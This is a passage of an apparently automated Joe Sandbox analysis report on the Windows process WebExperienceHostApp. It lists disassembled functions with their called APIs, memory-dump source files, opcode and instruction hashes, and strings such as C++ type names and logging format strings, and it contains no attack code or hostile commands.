                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE002A51FD
                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE002A524B
                                                                      • Part of subcall function 00007FFE002AF6C4: memcpy.VCRUNTIME140_APP(?,?,?,?,?,00007FFE00299A2E), ref: 00007FFE002AF728
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                    • String ID:
                                                                    • API String ID: 3063020102-0
                                                                    • Opcode ID: 79d540ea51c9c8684db26c2c73061a7d9b057795865d6f807bc3eefad819df45
                                                                    • Instruction ID: 5d0593d911aca874d36bffd69528d9a4c53e4dacdca83f9dea6d8dae959e589b
                                                                    • Opcode Fuzzy Hash: 79d540ea51c9c8684db26c2c73061a7d9b057795865d6f807bc3eefad819df45
                                                                    • Instruction Fuzzy Hash: 67D17E22B09B528AFB00DF65D5402AD77B2EB89B88F444132DF5D17BAADF38D449C340
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturnmemset
                                                                    • String ID:
                                                                    • API String ID: 1654775311-0
                                                                    • Opcode ID: f488e61922aef436b5504598907c68809d2f9e99bad861a33ddb3e8b3e903fc0
                                                                    • Instruction ID: 4733918fb890dc772d17be86377b72cea3f371e90f092635cbf166963f7945f5
                                                                    • Opcode Fuzzy Hash: f488e61922aef436b5504598907c68809d2f9e99bad861a33ddb3e8b3e903fc0
                                                                    • Instruction Fuzzy Hash: 70A1CE26F0869385FB108BA5D4546BC3BA1AF95B98F544436DF9D17BAACF2CE481C310
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturnmemset
                                                                    • String ID:
                                                                    • API String ID: 1654775311-0
                                                                    • Opcode ID: c071987ddd9203034660ba9ef37eb721160e54cc667c50a7604a29b6ba024e6c
                                                                    • Instruction ID: ea25a9f63c92121bd1b0f6b7841cbbd45f592082d724c0a86c8cbedfd0977874
                                                                    • Opcode Fuzzy Hash: c071987ddd9203034660ba9ef37eb721160e54cc667c50a7604a29b6ba024e6c
                                                                    • Instruction Fuzzy Hash: 52A1AE22F0869385FB108BA595546BC3BE5BB95B98F558436DF4D17BAACF3CE881C300
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturnmemset
                                                                    • String ID:
                                                                    • API String ID: 1654775311-0
                                                                    • Opcode ID: bb337b9f9481757840d770474c2193e23b0367878493d4b4d325679eebeba086
                                                                    • Instruction ID: 1549224e5cf439ec60bb0a157f9298c79e3afd95925db189b14f19fc6ccf45bd
                                                                    • Opcode Fuzzy Hash: bb337b9f9481757840d770474c2193e23b0367878493d4b4d325679eebeba086
                                                                    • Instruction Fuzzy Hash: D4A1AE62B0869389FB11CBA595542BD3FE6AB85B98F554435CF8E17BAECF2CE441C300
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturnmemset
                                                                    • String ID:
                                                                    • API String ID: 1654775311-0
                                                                    • Opcode ID: 00d1b1d28c26761a56a170c2d61dfcc133020e5adfdd53a827a558dcc67b8241
                                                                    • Instruction ID: a9ce3cb798ad3126428005cfc3734c574eecbb3fb3aa6cbbec549055c412760a
                                                                    • Opcode Fuzzy Hash: 00d1b1d28c26761a56a170c2d61dfcc133020e5adfdd53a827a558dcc67b8241
                                                                    • Instruction Fuzzy Hash: 5CA1B366B0A69389FB12CBA594502BD3FA2AB85B94F544039DF9D177ABCF2CD445C300
                                                                    APIs
                                                                      • Part of subcall function 00007FFE00289DEC: memcpy.VCRUNTIME140_APP ref: 00007FFE00289E3A
                                                                    • GetDiskFreeSpaceExW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFE0028A775
                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0028A7DF
                                                                      • Part of subcall function 00007FFE00289B28: memcpy.VCRUNTIME140_APP ref: 00007FFE00289C07
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$DiskFreeSpace_invalid_parameter_noinfo_noreturn
                                                                    • String ID:
                                                                    • API String ID: 3001910822-0
                                                                    • Opcode ID: f83b6692a73cea2080cbce9cadfd327f0b4a4e597a4eabc9e5dd105b028ec53d
                                                                    • Instruction ID: 11478a5d4a0507bd5176d8327612e816fe77d3609bf28ee564bfe2db0696da88
                                                                    • Opcode Fuzzy Hash: f83b6692a73cea2080cbce9cadfd327f0b4a4e597a4eabc9e5dd105b028ec53d
                                                                    • Instruction Fuzzy Hash: F0415D26B05B4288FB00CFA1D8406AC2BB5BB88BA8F545526CF5D27BADDF38D195C340
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale___lc_locale_name_func
                                                                    • String ID:
                                                                    • API String ID: 3366915261-0
                                                                    • Opcode ID: 3aefda838095f36d881641da190c0c7e9a60875fb69119685df66e715777b3d5
                                                                    • Instruction ID: 68657b6ba60e5539cfbd5959a5ccd89b76147062ce0348841bb341844f0b22a9
                                                                    • Opcode Fuzzy Hash: 3aefda838095f36d881641da190c0c7e9a60875fb69119685df66e715777b3d5
                                                                    • Instruction Fuzzy Hash: 72F05E26D2C14383E2D44A54C5647396AB0EB89309F401632D34E427F9CE6CD5468711
                                                                    APIs
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,-00000030,00007FF60BD753F7,?,?,00000000,00007FF60BD75353), ref: 00007FF60BD738A9
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882624863.00007FF60BD71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF60BD70000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882563067.00007FF60BD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882667394.00007FF60BD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882704903.00007FF60BD7E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882737371.00007FF60BD7F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff60bd70000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: HeapProcess
                                                                    • String ID:
                                                                    • API String ID: 54951025-0
                                                                    • Opcode ID: 85425f6197481278742de1b63da327964b268bf711eae6a286b343b9d667293f
                                                                    • Instruction ID: a4d0a0ce003aceb493683c65b625920749fa26f306a95cdedd2b0b3e9fdb8268
                                                                    • Opcode Fuzzy Hash: 85425f6197481278742de1b63da327964b268bf711eae6a286b343b9d667293f
                                                                    • Instruction Fuzzy Hash: 00C08C41EA8A0A81F61C47E3E8020A88291AB4DB90A28C030CE1A85360EC2C50C24300
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c20a8d291a807d67d3ebe4593626ecfcd307b17876e71668de1d50c8bdd57507
                                                                    • Instruction ID: 6e69e3a0ad0d9cb3cef3874eefb8c165efe28c32237add5961618afd46d09bd5
                                                                    • Opcode Fuzzy Hash: c20a8d291a807d67d3ebe4593626ecfcd307b17876e71668de1d50c8bdd57507
                                                                    • Instruction Fuzzy Hash: 37723B36A08A868AEB558F1AD54027D7B61FB86F88F548132DF4D077AACF3DD891D310
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: df20000e928d061a69dc3360d5981c551a07d285a3d79d4502343c2dcc2793e1
                                                                    • Instruction ID: de19e08edfffdf2754b64cd934aafd7ad3d1c06649f0a277c0acbb6c751f3e88
                                                                    • Opcode Fuzzy Hash: df20000e928d061a69dc3360d5981c551a07d285a3d79d4502343c2dcc2793e1
                                                                    • Instruction Fuzzy Hash: C1721726A08A8686EB658F1AD55027D7B60FB86F88F548132DF4D077ABDF3DD895C300
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5fd043e71901fc21d66483f827b5135cf1f195ccc252076dba90067cad4e0e69
                                                                    • Instruction ID: 730596551458c00069d99739924b4aaf37cbc603831eca5aa51dd673ac33c0e3
                                                                    • Opcode Fuzzy Hash: 5fd043e71901fc21d66483f827b5135cf1f195ccc252076dba90067cad4e0e69
                                                                    • Instruction Fuzzy Hash: C6725B72A08A8685EB558F1AD59427C3BA5FB84F88F148532DF9D077AACF3DE491C310
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e156633b7f18a88654c026383be2ae0ceb209a8ba85a82a8b42f20027217c75e
                                                                    • Instruction ID: 6fcb4732d1a79e0ce32717d03632ce0395788302f93a40257724015c0de84e81
                                                                    • Opcode Fuzzy Hash: e156633b7f18a88654c026383be2ae0ceb209a8ba85a82a8b42f20027217c75e
                                                                    • Instruction Fuzzy Hash: AD023B26A09A568AEB508F19C45037C3BA1FB85F98F949032DF4E577AACF3DD895C310
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3db00362e69b124af2a9ba7d26aeb2bcb1db837013d4a32a9d6dd9abda21b49d
                                                                    • Instruction ID: 9bf3c7b0f5349a56ea0841cdf59dfda14df04a3fe0ae6816003555c9ceac157d
                                                                    • Opcode Fuzzy Hash: 3db00362e69b124af2a9ba7d26aeb2bcb1db837013d4a32a9d6dd9abda21b49d
                                                                    • Instruction Fuzzy Hash: B8026D62A09A4799EB11CF29C45037C3BA5AB84F88F549132DB5E473BACF3DD986C350
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a98c1b88eb9c640e9ce4bb8c213d6810a72f27032ed787440f2bc18eff2a669a
                                                                    • Instruction ID: ad7d9bcd5ec833422e00ba158d43dfa26023c799b69b564fa3f6c64917e8f7d0
                                                                    • Opcode Fuzzy Hash: a98c1b88eb9c640e9ce4bb8c213d6810a72f27032ed787440f2bc18eff2a669a
                                                                    • Instruction Fuzzy Hash: 4F6100B2B15B0AD2EF14CF5AA814669B699FB88BC4F458936DF0D43B69EE3CD444C300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Name::operator+
                                                                    • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $unsigned $void$volatile$wchar_t
                                                                    • API String ID: 2943138195-1388207849
                                                                    • Opcode ID: 37cd17523382c81690176946402e2147554894c591ccd7ecb33aaa85e6f6bad3
                                                                    • Instruction ID: 8f429bd993d29838d731a3875f5e0f71ed10f0973e6ed576097589baab665ca2
                                                                    • Opcode Fuzzy Hash: 37cd17523382c81690176946402e2147554894c591ccd7ecb33aaa85e6f6bad3
                                                                    • Instruction Fuzzy Hash: DCF15272E18E128CFB148B6AD4542BC2BB0BB34364F4045B5CA2D7AAB9DF7CE544C348
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882624863.00007FF60BD71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF60BD70000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882563067.00007FF60BD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882667394.00007FF60BD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882704903.00007FF60BD7E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882737371.00007FF60BD7F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff60bd70000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentFormatMessageThread
                                                                    • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$LogNt$Msg:[%ws] $ReturnHr$ReturnNt$[%hs(%hs)]$[%hs]
                                                                    • API String ID: 2411632146-1363043106
                                                                    • Opcode ID: 5c63f51611423cf63e7b47493f3111f8813da6670d8a67703035579ad02dc22e
                                                                    • Instruction ID: 549c77c6234cbce8dc0bcc887b86cee13bf18a296bbc1cc15aed1714049aca3f
                                                                    • Opcode Fuzzy Hash: 5c63f51611423cf63e7b47493f3111f8813da6670d8a67703035579ad02dc22e
                                                                    • Instruction Fuzzy Hash: 1D718C21A88A4281EB68CB55A5046F9A3A0FF4CB94F648236DD0FC77F4EFBCE5459704
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Name::operator+$Replicator::operator[]
                                                                    • String ID: `anonymous namespace'
                                                                    • API String ID: 3863519203-3062148218
                                                                    • Opcode ID: 180c6269b417ee698a575686cc6b4d1958a01edd13727ba1ef1c9a4d3a0f115e
                                                                    • Instruction ID: 011645197282d4017f46d78c107f8942601c39854cb50678af1d6c366422002a
                                                                    • Opcode Fuzzy Hash: 180c6269b417ee698a575686cc6b4d1958a01edd13727ba1ef1c9a4d3a0f115e
                                                                    • Instruction Fuzzy Hash: A5E1AC72A08F8289EB10CF66E4801AD77A0FB687A4F804175EA6D2BB79DF3CD554C704
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: NameName::Name::operator+$atolswprintf_s
                                                                    • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
                                                                    • API String ID: 1620834350-2441609178
                                                                    • Opcode ID: a29e71e536bdf6e447e3ff857d12b2a59669ef8e6c250949fd0826cea6345cbe
                                                                    • Instruction ID: a73df9be7e6a124fbc68dc601dacd18bc1bce1f57fc6c7d745d2983fb7bb18dc
                                                                    • Opcode Fuzzy Hash: a29e71e536bdf6e447e3ff857d12b2a59669ef8e6c250949fd0826cea6345cbe
                                                                    • Instruction Fuzzy Hash: 3EF18162E08E428CFB149B76C5581BD27E0AF65764F5401B6CE2E36ABADF3CE545C308
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Name::operator+
                                                                    • String ID:
                                                                    • API String ID: 2943138195-0
                                                                    • Opcode ID: 79b7bf95ee04f70869f45912711fcc0273f108ef1dfd3bc8f68c2be49afff2d4
                                                                    • Instruction ID: ecac51d10f14f5175c5d5c8384f0ede5ea19ded785fa71883cf973a63bc4e1af
                                                                    • Opcode Fuzzy Hash: 79b7bf95ee04f70869f45912711fcc0273f108ef1dfd3bc8f68c2be49afff2d4
                                                                    • Instruction Fuzzy Hash: A9F18C72F08A829EF710DFA6E4901EC37B0EB2475CB444175EA5D67AA9DF38D50AC348
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$__strncntfreemalloc$CompareInfoString
                                                                    • String ID:
                                                                    • API String ID: 3420081407-0
                                                                    • Opcode ID: 8b6a2b54a2774314e61cfe64b8eab3a827394a4d764bd27520b14f448ccade5b
                                                                    • Instruction ID: 5f519edaf91eb8af3337a6690d26144c51cf6753cf4bd8cbf9fe36a51e60fdcb
                                                                    • Opcode Fuzzy Hash: 8b6a2b54a2774314e61cfe64b8eab3a827394a4d764bd27520b14f448ccade5b
                                                                    • Instruction Fuzzy Hash: 45A1C436A0A783C6EB30CBA584503796AD1EF84BA4F544231DB6D067EADF7CE8488350
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
